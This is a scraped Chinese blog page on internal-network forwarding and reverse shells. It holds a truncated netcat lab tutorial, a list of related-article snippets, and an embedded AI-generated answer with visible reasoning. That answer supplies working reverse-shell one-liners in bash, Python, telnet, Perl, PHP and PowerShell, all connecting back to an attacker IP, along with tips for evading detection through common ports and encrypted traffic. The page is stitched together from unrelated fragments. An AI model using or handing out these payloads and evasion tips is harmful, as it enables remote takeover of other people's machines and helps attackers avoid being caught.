内网转发——反弹shell

内网渗透:反弹shell技术详解与实验
最新推荐文章于 2024-07-10 15:37:22 发布
原创 最新推荐文章于 2024-07-10 15:37:22 发布 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了内网转发的目的、代理方式,特别是重点讲解了内网转发的三种形式:反弹shell、反弹端口和反弹代理。通过多个实验,包括使用nc工具、linux的各种方式以及Msf框架,演示了如何在不同环境下实现内网shell的反弹,旨在帮助读者理解并掌握内网渗透中的关键技巧。

内网转发的目的:

渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。

代理方式:

正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。

   

反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务器而言的,当我们请求 www.baidu.com 的时候,背后可能有成千上万台服务器为我们服务,但具体是哪一台,不需要知道,你只需要知道反向代理服务器是谁就好了,www.baidu.com 就是我们的反向代理服务器,反向代理服务器会帮我们把请求转发到真实的服务器那里去,比如说负载均衡

内网转发的三种形式:

1.反弹shell:在攻击者机器,获取受害者机器的命令行

2.反弹端口:受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发

3.反弹代理:将攻击者的流量转发到内网其他服务器上

实验一:利用nc工具反弹shell

实验环境:win2008、win2010

实验步骤:

一、利用nc正向连接shell

1.将被控服务器shell反弹到本地的4444端口,并监听4444端口,受害者输入以下命令;

nc -lvp 4444 -e cmd.exe      (反弹windows shell)
nc -lvp 4444 -e /bin/bash     (反弹linux shell)

本实验以windows为例:

2.攻击机连接被控服务器的4444端口,攻击者输入:

nc -vv 受害机ip 4444

  

  

二、利用nc反弹shell

1.攻击机监听4444端口,攻击机输入:

nc -lvp 4444

本实验以windows为例:

   

最低0.47元/天 解锁文章
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 5099
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
内网端口转发 - 简单记录
fa1c4的blog
07-17 1054
常见的端口流量转发工具 (1) SSH (2) EW (3) NetCat (4) LCX 常见目的 (1) 安全运维: 绕过堡垒机/防火墙限制, 建立TCP链接, 对内网服务器进行远程管理 (2) 内网渗透: 绕过堡垒机/防火墙限制, 实现对内网服务器的攻击 分类 (1) 本地转发 (2) 远程转发 (3) 动态转发 本地转发 本地主机开启端口转发功能, 需要在用户机执行 ssh -L 8866:196.168.10.1:23 -fN 196.168.10.2 示意图 远程转发 堡垒机开启端口转发功能
内网转发——反弹端口
cxrpty的博客
03-17 4177
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
内网渗透之——内网转发反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
端口映射后的公网反弹shell
来到了学渣的博客
04-01 3780
前言: 渗透一个网站最后获取该web服务器权限的时候,可能会思考,如何把公网的IP反弹到自己内网(私有ip)的虚拟机上?这时候我们就需要把内网的ip和端口映射成一个公网的ip和端口从而实现内网穿透。 这里我用的是NATAPP,一个基于ngrok的国内高速内网转发工具 https://natapp.cn/register 首先快速注册,然后购买免费隧道(非常适合我这样的穷学生) 我这里用的是TC...
内网渗透-反弹Shell
道阻且长,行则将至
07-07 3709
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
Linux下内网反弹技巧总结与杂谈
u014389734的博客
07-08 1106
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
内网内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 7213
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
内网内网转发】——http协议代理转发_reGeorg代理转发
weixin_45588247的博客
09-15 3838
01【内网内网转发】——http协议代理转发_reGeorg代理转发 文章目录01【内网内网转发】——http协议代理转发_reGeorg代理转发一、环境准备:二、工具:三、概念:四、学习目的:五、reGeorg介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP): 一、环境准备:   关闭靶机电脑的防火墙及病毒和威胁防护的实时防护。   开启内网主机的远程桌面。   在被控服务器windows2008上面安装IIS服务器。 二、工
内网转发
秋水的博客
10-14 3399
内网转发简介 在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转...
内网转发教程
Wrop的博客
07-10 920
本文介绍了内网转发的相关内容
内网内网转发】——代理转发_SSH代理转发
weixin_45588247的博客
09-22 2656
文章目录一、环境准备:二、工具:三、概念:四、学习目的:五、SSH代理转发介绍:六、SSH代理转发使用说明:七、SSH代理转发:1. 正向动态转发隧道:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程: 一、环境准备:   准备一台CentOS主机,并为CentOS主机添加一张网卡,并为它配置为处于内网环境。以下是网上配置过程: 1、添加网卡: 2、查看新添加的网卡mac地址: 3、找到新添加的网卡mac地址对应的是哪张网卡: 4、配置网卡: 命令: cd /etc/sysco
内网端口转发
路虽远,行将至。事虽难,做必达。
08-10 1215
在渗透过程中拿到主机权限后,下一步通常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行通信。...
内网转发简介
buffedon的博客
10-06 1136
内网转发内网转发分类分类方式一 (按原理分)分类方式二 (按攻击手法分)端口转发,隧道,代理,反弹shell反弹shell的目的端口转发动态转发本地转发远程转发端口转发与端口映射代理参考文章 在后渗透阶段,外网是无法访问内网的,因此可以通过 端口转发(隧道) 的方式,将web服务器作为代理,从而使得攻击者可以操控内网主机 内网转发分类 分类方式一 (按原理分) 代理方式 socket Netcat,netsh,LCX socks EW,Ssocks 隧道方式 SSH,HTTP,IMCP
内网渗透测试——内网转发
cldimd的博客
04-01 829
内网转发目的: 渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。 A可以访问B的80端口,但是不能访问B的3389端口。 A可以访问B,B可以访问C,但是A不可以访问C。需要通过B转发数据,让A和C进行通信。 代理: (一)正向代理 我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户...
内网代理转发工具
tomyyyyy
12-09 4779
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
Socks代理反弹突破内网(freebuf)
cnbird's blog
09-02 4487
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。 对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射
内网转发ngrok
huihui870311的专栏
06-01 543
https://ngrok.com/
不用kali怎么反弹shell
最新发布
11-12
<think> 嗯,用户想找不使用kali系统实现反弹shell的方法。看来用户对渗透测试有一定了解,但可能想用更通用的系统做测试。之前引用的资料都围绕kali,但用户明确要求避开它。 用户提到的三个引用里其实暗藏线索:引用1的centos7受害机命令、引用2的telnet正向/反向shell方法、引用3的ubuntu基础环境配置。这些都能拆解出非kali方案,特别ubuntu和centos都是常见发行版。 用户可能遇到的情况:1)手头没有kali环境 2)想测试目标对非渗透系统的防御 3)纯粹想学通用技术。从提问简洁度看,ta应该不是纯新手,至少知道反弹shell概念。 重点要给出跨发行版的解决方案。核心思路是:反弹shell本质是建立反向TCP连接,只要攻击机有netcat监听,受害机能执行bash/csh/python等命令即可。因此方案可以按语言分类: 1)最通用的bash方案:虽然引用1用了kali IP,但命令本身是纯bash的,在centos/ubuntu都可用。需补充说明端口转发逻辑(用户可能对NAT环境不熟)。 2)兼容性更强的telnet方案:引用2的正向shell方法其实更稳定,适合老系统,但需要攻击机双端口监听。这个细节要展开,很多教程会忽略。 3)高级的python/perl方案:这些语言几乎预装在所有linux系统,能绕过bash被禁的情况。特别是python方案优雅且易伪装。 4)Windows方向延伸:虽然用户没问,但提一句powershell方案会更全面,体现差异性。不过要标注是扩展内容。 需要警惕的坑:1)某些云主机默认无nc 2)目标机可能有出站限制 3)防火墙规则。这些在注意事项里强调。 最后用场景化建议收尾:内网渗透用bash,受限环境用python,老系统用telnet。保持回答的阶梯性——从基础到进阶,但避免堆砌命令。 </think> 以下是不使用Kali系统实现反弹Shell的多种方法(基于Linux/Unix系统),核心思路是利用常见系统工具建立反向TCP连接: --- ### 一、Bash原生方法(推荐) **适用系统**:CentOS、Ubuntu、Debian等所有支持Bash的系统 **受害机执行**: ```bash bash -i >& /dev/tcp/攻击机IP/端口 0>&1 ``` **攻击机监听**: ```bash nc -lvvp 端口 # 需安装netcat ``` **原理**: 通过Bash内置的`/dev/tcp`伪设备建立TCP连接,将标准输入/输出/错误重定向到网络套接字[^1]。 --- ### 二、Python实现 **适用系统**:预装Python的系统(绝大多数Linux发行版) **受害机执行**: ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' ``` --- ### 三、Telnet方案(老系统兼容) **适用系统**:开启Telnet服务的旧系统 #### 方法1:反向Shell ```bash # 受害机执行 rm -f /tmp/f; mkfifo /tmp/f; telnet 攻击机IP 端口 0</tmp/f | /bin/bash 1>/tmp/f ``` #### 方法2:正向Shell(攻击机主动连接受害机) ```bash # 受害机监听 nc -l -p 端口 -e /bin/bash # 需支持-e参数 # 攻击机连接 nc 受害机IP 端口 ``` --- ### 四、Perl实现 ```perl perl -e 'use Socket;$i="攻击机IP";$p=端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` --- ### 五、PHP实现 ```php php -r '$sock=fsockopen("攻击机IP",端口);exec("/bin/sh -i <&3 >&3 2>&3");' ``` --- ### 六、注意事项 1. **网络可达性**: 确保受害机可访问攻击机IP(若攻击机在NAT后需端口转发)。 2. **工具依赖**: - `netcat`需支持`-e`参数(如`nc.traditional`) - 部分系统默认禁用`/dev/tcp`(需启用Bash编译选项) 3. **防御规避**: - 使用常见端口(如53、443) - 加密流量(`ncat --ssl`或`openssl s_client`) --- ### 七、扩展场景(Windows系统) ```powershell # PowerShell反弹(受害机执行) powershell -c "$client = New-Object System.Net.Sockets.TCPClient('攻击机IP',端口);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` --- **
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值